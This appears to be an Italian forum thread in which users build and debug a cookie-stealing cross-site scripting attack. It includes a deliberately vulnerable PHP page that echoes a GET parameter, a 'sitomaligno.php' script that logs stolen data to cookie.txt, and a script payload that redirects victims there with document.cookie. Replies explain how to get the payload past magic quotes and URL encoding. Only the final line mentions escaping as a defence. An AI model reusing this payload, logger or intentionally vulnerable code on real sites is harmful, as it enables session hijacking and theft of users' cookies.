XSS testing

[lomiz]

Avendo la passione per la sicurezza informatica leggendo un testo dulle XSS (Cross Site Scripting) ho deciso di testarle.

Oggi ho provato a testare sul mio sito il cookie stealing attraverso il Cross Site Scripting.

Ho quindi creato una pagina web sul mio sito, xss.php.

Ho inserito questo codice php:

<?php
$var = $_GET['message'];
echo "$var";
?>


Che DOVREBBE essere bugguto e vulnerabile da XSS in quanto non c'è un controllo sul carattere <.

Ho quindi creato un altra pagina: sitomaligno.php

con questo codice:

<html>
<head>
<title>prova</title>
</head><body>
<h1>Not Found</h1>
<?php
$data = $_GET['data'];
$fh = fopen("cookie.txt",'a+');
fwrite($fh, "$data"."\n");
fclose($fh);
?>


dovrei averti rubato i cookie</p>
</body></html>


Adesso se non sbaglio dal momento che la vittima andasse qua:
http://theninjateam.altervista.org/h...t/xss/xss.php?<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script>

Dovrei avergli rubato i cookie.
Ma tutto cio' non funziona.
Mi direte: "ovvio che non rubi i cookie... non gliel'hai dati..."

Ma non mi si forma alcun file cookie.txt quando se ne dovrebbe formare uno vuoto...

Il bello è che quando vado nel link http://theninjateam.altervista.org/h...t/xss/xss.php?<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script> non mi carica nemmeno la pagina sitomaligno.php...

Cos'ho sbagliato?

[}gu|do[z]{®©]

Semmai dovrebbe essere:

http://theninjateam.altervista.org/....s.php?message=<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data=" + document.cookie</script>

ma dubito funzioni...

[lomiz]

Perchè dubiti del suo funzionamento?
Cmq adesso provo...

[lomiz]

Nessuno che è in grado di rispondermi? :master:

[lomiz]

up

[Habanero]

scusa ma hai fatto un po' di debug per vedere cosa non funziona???

Prima di tutto io farei:

Codice PHP:

<?php
$var = $_GET['message'];
echo stripslashes($var);
?>

nel caso ci fossero i magic quotes attivati... nell'url che passi ci sono dei doppi apici!

Per seconda cosa nell'url sostituisci + con %2b

codice:

http://theninjateam.altervista.org/...ss.php?message=<script>window.location="http://theninjateam.altervista.org/hacktest/xss/sitomaligno.php?data="%2bdocument.cookie</script>

Il + ha il significato di spazio vuoto nella codifica urlencode... e viene quindi sostituito... ma te ne rendi conto semplicemente visualizzando il codice html generato...

[lomiz]

Ok grazie

Non ho ben capito questa frase però:
nel caso ci fossero i magic quotes attivati... nell'url che passi ci sono dei doppi apici!


Da quello che so la funzione magic quotes mi mette lo / davanti a ' e < non a " :master:

[Habanero]

http://it2.php.net/magic_quotes

magic quotes mette un \ davanti a ', ", \, e NULL



questo già ti dice che se i MQ sono attivi... è un po' dura... a meno che uno sia masochista a fare uno stripslashes e poi mandare in output.

[lomiz]

Quindi se ci fossero stati i Magic Quotes attivati, ma non ci sono, il tutto non sarebbe funzionato se non avessi apportato la tua modifica?

[Habanero]

o meglio... fare l'escape dei caratteri pericolosi è un buon metodo per non incorrere in XSS...